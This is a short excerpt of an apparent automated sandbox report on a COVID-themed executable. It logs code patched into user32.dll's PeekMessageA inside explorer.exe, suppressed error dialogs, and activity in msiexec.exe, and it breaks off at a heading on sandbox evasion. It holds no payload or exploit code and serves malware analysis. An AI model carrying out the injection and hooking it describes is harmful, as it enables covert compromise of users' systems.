          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion: